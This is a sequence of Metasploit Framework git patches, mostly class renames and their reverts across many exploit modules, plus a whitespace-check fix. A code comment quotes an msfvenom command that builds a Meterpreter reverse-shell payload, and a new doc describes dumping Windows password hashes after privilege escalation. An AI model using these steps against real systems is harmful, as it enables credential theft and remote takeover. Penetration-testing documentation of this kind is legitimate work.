'set' -class Metasploit4 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/manage/sticky_keys.rb b/modules/post/windows/manage/sticky_keys.rb index ce5bdbc771..2a9c1dd6ca 100644 --- a/modules/post/windows/manage/sticky_keys.rb +++ b/modules/post/windows/manage/sticky_keys.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry From 62217fff2bffb7c72da375da3f8dc786fc9af48b Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Mon, 7 Mar 2016 09:58:21 +0100 Subject: [PATCH 502/686] change remaining class names --- modules/encoders/x86/bloxor.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/encoders/x86/bloxor.rb b/modules/encoders/x86/bloxor.rb index 52814983cd..4439aba70d 100644 --- a/modules/encoders/x86/bloxor.rb +++ b/modules/encoders/x86/bloxor.rb @@ -24,7 +24,7 @@ require 'rex/encoder/bloxor/bloxor' # >ruby msfvenom -p windows/meterpreter/reverse_tcp RHOST=192.168.2.2 LHOST=192.168.2.1 LPORT=80 -a x86 -e x86/bloxor -b '\x00' -f raw | ndisasm -b32 -k 128,1 - # -class Metasploit3 < Rex::Encoder::BloXor +class Metasploit < Rex::Encoder::BloXor # Note: Currently set to manual, bump it up to automatically get selected by the framework. # Note: BloXor by design is slow due to its exhaustive search for a solution. From 7d773b65b604bd17b3d8802981fb5aa2cf9f1d26 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Mon, 7 Mar 2016 14:44:23 +0100 Subject: [PATCH 503/686] revert ssl_login_pubkey for now --- modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb index fd31314462..2fd040823b 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb @@ -8,7 +8,7 @@ require 'net/ssh' require 'metasploit/framework/login_scanner/ssh' require 'metasploit/framework/credential_collection' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Report From 1bfbbe918ccc3d5852b42b81442a9996c016ad29 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Mon, 7 Mar 2016 12:17:21 -0600 Subject: [PATCH 504/686] Add documentation for post/windows/gather/hashdump --- .../modules/post/windows/gather/hashdump.md | 47 +++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 documentation/modules/post/windows/gather/hashdump.md diff --git a/documentation/modules/post/windows/gather/hashdump.md b/documentation/modules/post/windows/gather/hashdump.md new file mode 100644 index 0000000000..fa617fadc6 --- /dev/null +++ b/documentation/modules/post/windows/gather/hashdump.md @@ -0,0 +1,47 @@ +The post/gather/hashdump module functions similarly to Meterpreter's built-in hashdump command. +Having this feature as a post module allows it to be used in different penetration testing +scenarios. + + +## Vulnerable Application + +--- + +To be able to use post/gather/hash_dump, you must meet these requirements: + +* You are on a Meterpreter type session. +* Target is a Windows platform. +* Execute it under the context of a high privilege account, such as SYSTEM. + +## Verification Steps + +--- + +Please see Overview for usage. + +## Scenarios + +--- + +**Upgrading to Meterpreter** + +To be able to use this module, a Meterpreter session is needed. To upgrade to this, the easiest +way is to use the post/multi/manage/shell_to_meterpreter module. Or, you can try: + +1. Use the exploit/multi/script/web_delivery module. +2. Manually generate a Meterpreter executable, upload it, and execute it. + +**High Privilege Account** + +Before using post/gather/hashdump, there is a possibility you need to escalate your privileges. +There are a few common options to consider: + +* Using a local exploit module. Or use Local Exploit Suggester, which automatically informs you + which exploits might be suitable for the remote target. +* getsystem. +* Stolen passwords. + +**Hashdump From Multiple Sessions** + +One major advantage of having hashdump as a post module is you can run against multiple hosts +easily. To learn how, refer to Overview for usage. From d859194e4e785694621f47a0e8409d33b1fb5325 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Mon, 7 Mar 2016 12:29:32 -0600 Subject: [PATCH 505/686] Update doc --- documentation/modules/post/windows/gather/hashdump.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/post/windows/gather/hashdump.md b/documentation/modules/post/windows/gather/hashdump.md index fa617fadc6..23da64bea1 100644 --- a/documentation/modules/post/windows/gather/hashdump.md +++ b/documentation/modules/post/windows/gather/hashdump.md @@ -38,7 +38,7 @@ There are a few common options to consider: * Using a local exploit module. Or use Local Exploit Suggester, which automatically informs you which exploits might be suitable for the remote target. -* getsystem. +* The getsystem command in Meterpreter. * Stolen passwords. **Hashdump From Multiple Sessions** From 3e0f8d67c9d9533dd1178166c7368ec1d8fc21f2 Mon Sep 17 00:00:00 2001 From: William Vu Date: Mon, 7 Mar 2016 13:14:37 -0600 Subject: [PATCH 506/686] Use #strip to more correctly simulate #blank? See f900d9cf26e4ddb53ac71f5a7aa92df21604f8c2. --- lib/rex/exploitation/js/memory.rb | 2 +- lib/rex/mime/message.rb | 2 +- lib/rex/parser/fusionvm_nokogiri.rb | 4 ++-- lib/rex/post/meterpreter/client_core.rb | 4 ++-- lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb | 2 +- lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb | 2 +- lib/rex/proto/kademlia/bootstrap_response.rb | 4 ++-- lib/rex/zip/blocks.rb | 2 +- lib/rex/zip/entry.rb | 2 +- 9 files changed, 12 insertions(+), 12 deletions(-) diff --git a/lib/rex/exploitation/js/memory.rb b/lib/rex/exploitation/js/memory.rb index 02bf4a3f19..a0a9d08e78 100644 --- a/lib/rex/exploitation/js/memory.rb +++ b/lib/rex/exploitation/js/memory.rb @@ -27,7 +27,7 @@ class Memory def self.heaplib2(custom_js='', opts={}) js = ::File.read(::File.join(Msf::Config.data_directory, "js", "memory", "heaplib2.js")) - unless custom_js.to_s.empty? + unless custom_js.to_s.strip.empty? js << custom_js end diff --git a/lib/rex/mime/message.rb b/lib/rex/mime/message.rb index 01440db0ae..205f561350 100644 --- a/lib/rex/mime/message.rb +++ b/lib/rex/mime/message.rb @@ -126,7 +126,7 @@ class Message header_string = self.header.to_s msg = header_string.empty? ? '' : force_crlf(self.header.to_s + "\r\n") - msg << force_crlf(self.content + "\r\n") unless self.content.to_s.empty? + msg << force_crlf(self.content + "\r\n") unless self.content.to_s.strip.empty? self.parts.each do |part| msg << force_crlf("--" + self.bound + "\r\n") diff --git a/lib/rex/parser/fusionvm_nokogiri.rb b/lib/rex/parser/fusionvm_nokogiri.rb index bff2821e18..a328a895bb 100644 --- a/lib/rex/parser/fusionvm_nokogiri.rb +++ b/lib/rex/parser/fusionvm_nokogiri.rb @@ -59,7 +59,7 @@ module Parser unless in_tag("JobOrder") case name when "OS" - unless @host.nil? or @text.to_s.empty? + unless @host.nil? or @text.to_s.strip.empty? tnote = { :type => "host.os.fusionvm_fingerprint", :data => { :os => @text.strip }, @@ -86,7 +86,7 @@ module Parser when "CVE" @vuln[:refs] << "CVE-#{@text.strip}" when "References" - unless @text.to_s.empty? + unless @text.to_s.strip.empty? @text.split(' ').each do |ref| next unless ref.start_with? "http" if ref =~ /MS\d{2}-\d{3}/ diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb index b84b88e4d2..c550eaef79 100644 --- a/lib/rex/post/meterpreter/client_core.rb +++ b/lib/rex/post/meterpreter/client_core.rb @@ -469,7 +469,7 @@ class ClientCore < Extension end if client.platform =~ /linux/ - if writable_dir.to_s.empty? + if writable_dir.to_s.strip.empty? writable_dir = tmp_folder end @@ -752,7 +752,7 @@ class ClientCore < Extension def tmp_folder tmp = client.sys.config.getenv('TMPDIR') - if tmp.to_s.empty? + if tmp.to_s.strip.empty? tmp = '/tmp' end diff --git a/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb b/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb index 58eb7dce4e..a69cfdfb07 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb @@ -31,7 +31,7 @@ class Wmi def query(query, root = nil) request = Packet.create_request('extapi_wmi_query') - request.add_tlv(TLV_TYPE_EXT_WMI_DOMAIN, root) unless root.to_s.empty? + request.add_tlv(TLV_TYPE_EXT_WMI_DOMAIN, root) unless root.to_s.strip.empty? request.add_tlv(TLV_TYPE_EXT_WMI_QUERY, query) response = client.send_request(request) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb index 335a45656b..3736e8faa6 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb @@ -66,7 +66,7 @@ class Webcam remote_browser_path = webrtc_browser_path - if remote_browser_path.to_s.empty? + if remote_browser_path.to_s.strip.empty? fail "Unable to find a suitable browser on the target machine" end diff --git a/lib/rex/proto/kademlia/bootstrap_response.rb b/lib/rex/proto/kademlia/bootstrap_response.rb index 71417f3983..f9e0b7bece 100644 --- a/lib/rex/proto/kademlia/bootstrap_response.rb +++ b/lib/rex/proto/kademlia/bootstrap_response.rb @@ -51,14 +51,14 @@ module Kademlia bootstrap_peer_id = Rex::Proto::Kademlia.decode_peer_id(message.body.slice!(0, 16)) bootstrap_tcp_port, bootstrap_version, num_peers = message.body.slice!(0, 5).unpack('vCv') # protocol says there are no peers and the body confirms this, so just return with no peers - if num_peers == 0 && message.body.to_s.empty? + if num_peers == 0 && message.body.to_s.strip.empty? peers = [] else peers_data = message.body # peers data is too long/short, abort return if peers_data.size % BOOTSTRAP_PEER_SIZE != 0 peers = [] - until peers_data.to_s.empty? + until peers_data.to_s.strip.empty? peer_data = peers_data.slice!(0, BOOTSTRAP_PEER_SIZE) peer_id = Rex::Proto::Kademlia.decode_peer_id(peer_data.slice!(0, 16)) ip, udp_port, tcp_port, version = peer_data.unpack('VvvC') diff --git a/lib/rex/zip/blocks.rb b/lib/rex/zip/blocks.rb index 4dc2892d5f..b2a4589710 100644 --- a/lib/rex/zip/blocks.rb +++ b/lib/rex/zip/blocks.rb @@ -116,7 +116,7 @@ class CentralDir end def pack - if @entry.central_dir_name.to_s.empty? + if @entry.central_dir_name.to_s.strip.empty? path = @entry.relative_path else path = @entry.central_dir_path diff --git a/lib/rex/zip/entry.rb b/lib/rex/zip/entry.rb index 4e90189126..b934d02814 100644 --- a/lib/rex/zip/entry.rb +++ b/lib/rex/zip/entry.rb @@ -76,7 +76,7 @@ class Entry end def central_dir_path - return nil if @central_dir_name.to_s.empty? + return nil if @central_dir_name.to_s.strip.empty? get_relative_path(@central_dir_name) end From aa5b2014279c149724e1da8e085c15e8019d553d Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 7 Mar 2016 13:19:33 -0600 Subject: [PATCH 507/686] Revert "revert ssl_login_pubkey for now" This reverts commit 7d773b65b604bd17b3d8802981fb5aa2cf9f1d26. --- modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb index 2fd040823b..fd31314462 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb @@ -8,7 +8,7 @@ require 'net/ssh' require 'metasploit/framework/login_scanner/ssh' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Report From 0e46cc0259970c2231fe46aec8745022b1973569 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 7 Mar 2016 13:19:42 -0600 Subject: [PATCH 508/686] Revert "change remaining class names" This reverts commit 62217fff2bffb7c72da375da3f8dc786fc9af48b. --- modules/encoders/x86/bloxor.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/encoders/x86/bloxor.rb b/modules/encoders/x86/bloxor.rb index 4439aba70d..52814983cd 100644 --- a/modules/encoders/x86/bloxor.rb +++ b/modules/encoders/x86/bloxor.rb @@ -24,7 +24,7 @@ require 'rex/encoder/bloxor/bloxor' # >ruby msfvenom -p windows/meterpreter/reverse_tcp RHOST=192.168.2.2 LHOST=192.168.2.1 LPORT=80 -a x86 -e x86/bloxor -b '\x00' -f raw | ndisasm -b32 -k 128,1 - # -class Metasploit < Rex::Encoder::BloXor +class Metasploit3 < Rex::Encoder::BloXor # Note: Currently set to manual, bump it up to automatically get selected by the framework. # Note: BloXor by design is slow due to its exhaustive search for a solution. From 44990e9721a486a3c1a9f8ff9201c9eac3217342 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 7 Mar 2016 13:19:48 -0600 Subject: [PATCH 509/686] Revert "change Metasploit4 class names" This reverts commit 3da9535e2213ec481e772e934407f69ae319dd84. --- modules/auxiliary/admin/appletv/appletv_display_image.rb | 2 +- modules/auxiliary/admin/appletv/appletv_display_video.rb | 2 +- modules/auxiliary/admin/chromecast/chromecast_reset.rb | 2 +- modules/auxiliary/admin/chromecast/chromecast_youtube.rb | 2 +- modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb | 2 +- modules/auxiliary/admin/firetv/firetv_youtube.rb | 2 +- modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb | 2 +- .../admin/http/foreman_openstack_satellite_priv_esc.rb | 2 +- modules/auxiliary/admin/http/katello_satellite_priv_esc.rb | 2 +- modules/auxiliary/admin/http/netgear_auth_download.rb | 2 +- modules/auxiliary/admin/http/nexpose_xxe_file_read.rb | 2 +- modules/auxiliary/admin/http/openbravo_xxe.rb | 2 +- modules/auxiliary/admin/http/typo3_sa_2009_001.rb | 2 +- modules/auxiliary/admin/http/typo3_sa_2010_020.rb | 2 +- .../auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb | 2 +- modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb | 2 +- modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb | 2 +- modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb | 2 +- modules/auxiliary/dos/dns/bind_tkey.rb | 2 +- modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb | 2 +- modules/auxiliary/dos/misc/dopewars.rb | 2 +- modules/auxiliary/dos/misc/ibm_tsm_dos.rb | 2 +- modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb | 2 +- modules/auxiliary/dos/ssl/openssl_aesni.rb | 2 +- modules/auxiliary/gather/alienvault_iso27001_sqli.rb | 2 +- modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb | 2 +- modules/auxiliary/gather/chromecast_wifi.rb | 2 +- modules/auxiliary/gather/impersonate_ssl.rb | 2 +- modules/auxiliary/gather/joomla_com_realestatemanager_sqli.rb | 2 +- modules/auxiliary/gather/joomla_contenthistory_sqli.rb | 2 +- modules/auxiliary/gather/mantisbt_admin_sqli.rb | 2 +- modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb | 2 +- modules/auxiliary/gather/opennms_xxe.rb | 2 +- modules/auxiliary/gather/shodan_search.rb | 2 +- .../scanner/http/allegro_rompager_misfortune_cookie.rb | 2 +- modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb | 2 +- modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb | 2 +- modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb | 2 +- modules/auxiliary/scanner/http/caidao_bruteforce_login.rb | 2 +- modules/auxiliary/scanner/http/chromecast_webserver.rb | 2 +- modules/auxiliary/scanner/http/concrete5_member_list.rb | 2 +- modules/auxiliary/scanner/http/host_header_injection.rb | 2 +- .../scanner/http/hp_sitescope_getfileinternal_fileaccess.rb | 2 +- .../scanner/http/hp_sitescope_getsitescopeconfiguration.rb | 2 +- .../scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb | 2 +- modules/auxiliary/scanner/http/http_put.rb | 2 +- .../auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb | 2 +- modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb | 2 +- modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb | 2 +- .../scanner/http/novell_file_reporter_fsfui_fileaccess.rb | 2 +- .../scanner/http/novell_file_reporter_srs_fileaccess.rb | 2 +- modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb | 2 +- modules/auxiliary/scanner/http/ssl.rb | 2 +- modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb | 2 +- modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb | 2 +- modules/auxiliary/scanner/printer/printer_delete_file.rb | 2 +- modules/auxiliary/scanner/printer/printer_download_file.rb | 2 +- modules/auxiliary/scanner/printer/printer_env_vars.rb | 2 +- modules/auxiliary/scanner/printer/printer_list_dir.rb | 2 +- modules/auxiliary/scanner/printer/printer_list_volumes.rb | 2 +- modules/auxiliary/scanner/printer/printer_ready_message.rb | 2 +- modules/auxiliary/scanner/printer/printer_upload_file.rb | 2 +- modules/auxiliary/scanner/printer/printer_version_info.rb | 2 +- .../auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb | 2 +- modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb | 2 +- modules/auxiliary/scanner/sap/sap_icf_public_info.rb | 2 +- modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb | 2 +- modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb | 2 +- modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb | 2 +- modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb | 2 +- modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb | 2 +- modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb | 2 +- modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb | 2 +- .../auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb | 2 +- .../auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb | 2 +- modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb | 2 +- modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb | 2 +- modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb | 2 +- modules/auxiliary/scanner/sap/sap_router_info_request.rb | 2 +- modules/auxiliary/scanner/sap/sap_service_discovery.rb | 2 +- modules/auxiliary/scanner/sap/sap_smb_relay.rb | 2 +- modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb | 2 +- modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb | 2 +- .../sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb | 2 +- .../scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb | 2 +- .../scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb | 2 +- .../scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb | 2 +- modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb | 2 +- modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb | 2 +- modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb | 2 +- .../scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb | 2 +- .../auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb | 2 +- modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb | 2 +- modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb | 2 +- modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb | 2 +- modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb | 2 +- .../auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb | 2 +- modules/auxiliary/scanner/ssh/detect_kippo.rb | 2 +- modules/auxiliary/scanner/ssh/fortinet_backdoor.rb | 2 +- modules/auxiliary/scanner/telnet/brocade_enable_login.rb | 2 +- modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb | 2 +- modules/auxiliary/server/tnftp_savefile.rb | 2 +- modules/encoders/x86/bmp_polyglot.rb | 2 +- modules/exploits/aix/local/ibstat_path.rb | 2 +- modules/exploits/android/local/futex_requeue.rb | 2 +- modules/exploits/freebsd/http/watchguard_cmd_exec.rb | 2 +- modules/exploits/freebsd/local/mmap.rb | 2 +- modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb | 2 +- modules/exploits/linux/http/advantech_switch_bash_env_exec.rb | 2 +- modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb | 2 +- modules/exploits/linux/http/dlink_dcs931l_upload.rb | 2 +- modules/exploits/linux/http/efw_chpasswd_exec.rb | 2 +- .../linux/http/foreman_openstack_satellite_code_exec.rb | 2 +- modules/exploits/linux/http/nginx_chunked_size.rb | 2 +- modules/exploits/linux/http/railo_cfml_rfi.rb | 2 +- modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb | 2 +- modules/exploits/linux/local/desktop_privilege_escalation.rb | 2 +- modules/exploits/linux/local/hp_smhstart.rb | 2 +- modules/exploits/linux/local/kloxo_lxsuexec.rb | 2 +- modules/exploits/linux/local/pkexec.rb | 2 +- modules/exploits/linux/local/sock_sendpage.rb | 2 +- modules/exploits/linux/local/sophos_wpa_clear_keys.rb | 2 +- modules/exploits/linux/local/udev_netlink.rb | 2 +- modules/exploits/linux/local/vmware_mount.rb | 2 +- modules/exploits/linux/local/zpanel_zsudo.rb | 2 +- modules/exploits/linux/misc/hikvision_rtsp_bof.rb | 2 +- modules/exploits/linux/smtp/exim_gethostbyname_bof.rb | 2 +- modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb | 2 +- modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb | 2 +- modules/exploits/multi/http/caidao_php_backdoor_exec.rb | 2 +- modules/exploits/multi/http/cups_bash_env_exec.rb | 2 +- modules/exploits/multi/http/gestioip_exec.rb | 2 +- modules/exploits/multi/http/git_client_command_exec.rb | 2 +- modules/exploits/multi/http/ispconfig_php_exec.rb | 2 +- modules/exploits/multi/http/jboss_invoke_deploy.rb | 2 +- modules/exploits/multi/http/moodle_cmd_exec.rb | 2 +- modules/exploits/multi/http/movabletype_upgrade_exec.rb | 2 +- modules/exploits/multi/http/nas4free_php_exec.rb | 2 +- modules/exploits/multi/http/phpmoadmin_exec.rb | 2 +- modules/exploits/multi/http/uptime_file_upload_2.rb | 2 +- modules/exploits/multi/http/werkzeug_debug_rce.rb | 2 +- modules/exploits/multi/http/zabbix_script_exec.rb | 2 +- modules/exploits/multi/misc/xdh_x_exec.rb | 2 +- modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb | 2 +- .../exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb | 2 +- modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb | 2 +- modules/exploits/osx/local/dyld_print_to_file_root.rb | 2 +- modules/exploits/osx/local/rootpipe.rb | 2 +- modules/exploits/osx/local/rootpipe_entitlements.rb | 2 +- modules/exploits/osx/local/rsh_libmalloc.rb | 2 +- modules/exploits/osx/local/setuid_tunnelblick.rb | 2 +- modules/exploits/osx/local/setuid_viscosity.rb | 2 +- modules/exploits/osx/local/tpwn.rb | 2 +- modules/exploits/unix/local/chkrootkit.rb | 2 +- modules/exploits/unix/local/setuid_nmap.rb | 2 +- modules/exploits/windows/browser/apple_quicktime_rdrf.rb | 2 +- modules/exploits/windows/browser/ms14_064_ole_code_execution.rb | 2 +- modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb | 2 +- modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb | 2 +- modules/exploits/windows/ftp/bison_ftp_bof.rb | 2 +- modules/exploits/windows/ftp/freefloatftp_user.rb | 2 +- modules/exploits/windows/ftp/sami_ftpd_list.rb | 2 +- modules/exploits/windows/http/netgear_nms_rce.rb | 2 +- modules/exploits/windows/http/sepm_auth_bypass_rce.rb | 2 +- modules/exploits/windows/local/applocker_bypass.rb | 2 +- modules/exploits/windows/local/persistence.rb | 2 +- modules/exploits/windows/local/registry_persistence.rb | 2 +- modules/post/android/capture/screen.rb | 2 +- modules/post/android/manage/remove_lock.rb | 2 +- modules/post/android/manage/remove_lock_root.rb | 2 +- modules/post/linux/gather/openvpn_credentials.rb | 2 +- modules/post/multi/gather/rubygems_api_key.rb | 2 +- modules/post/windows/gather/ntds_location.rb | 2 +- modules/post/windows/manage/killav.rb | 2 +- modules/post/windows/manage/sticky_keys.rb | 2 +- 175 files changed, 175 insertions(+), 175 deletions(-) diff --git a/modules/auxiliary/admin/appletv/appletv_display_image.rb b/modules/auxiliary/admin/appletv/appletv_display_image.rb index 4bec3cb4e3..5b009c7889 100644 --- a/modules/auxiliary/admin/appletv/appletv_display_image.rb +++ b/modules/auxiliary/admin/appletv/appletv_display_image.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/appletv/appletv_display_video.rb b/modules/auxiliary/admin/appletv/appletv_display_video.rb index 88e5e864de..ff0370dc4a 100644 --- a/modules/auxiliary/admin/appletv/appletv_display_video.rb +++ b/modules/auxiliary/admin/appletv/appletv_display_video.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'uri' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/chromecast/chromecast_reset.rb b/modules/auxiliary/admin/chromecast/chromecast_reset.rb index 0e965f75a1..cd245599e9 100644 --- a/modules/auxiliary/admin/chromecast/chromecast_reset.rb +++ b/modules/auxiliary/admin/chromecast/chromecast_reset.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/chromecast/chromecast_youtube.rb b/modules/auxiliary/admin/chromecast/chromecast_youtube.rb index e741ca279c..5263d13b1f 100644 --- a/modules/auxiliary/admin/chromecast/chromecast_youtube.rb +++ b/modules/auxiliary/admin/chromecast/chromecast_youtube.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb b/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb index cccc1d1f0d..6d93c9e626 100644 --- a/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb +++ b/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/firetv/firetv_youtube.rb b/modules/auxiliary/admin/firetv/firetv_youtube.rb index 36fac9865f..ffeedd5885 100644 --- a/modules/auxiliary/admin/firetv/firetv_youtube.rb +++ b/modules/auxiliary/admin/firetv/firetv_youtube.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb index feb085fe81..9d89a5b782 100644 --- a/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb +++ b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb @@ -8,7 +8,7 @@ require 'bcrypt' require 'digest' require 'openssl' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb b/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb index 924d344a3c..0fb48eb584 100644 --- a/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb +++ b/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb b/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb index c199b375c9..e442620315 100644 --- a/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb +++ b/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/netgear_auth_download.rb b/modules/auxiliary/admin/http/netgear_auth_download.rb index ba2d3c65df..c79e02e6c4 100644 --- a/modules/auxiliary/admin/http/netgear_auth_download.rb +++ b/modules/auxiliary/admin/http/netgear_auth_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Auxiliary::Report include 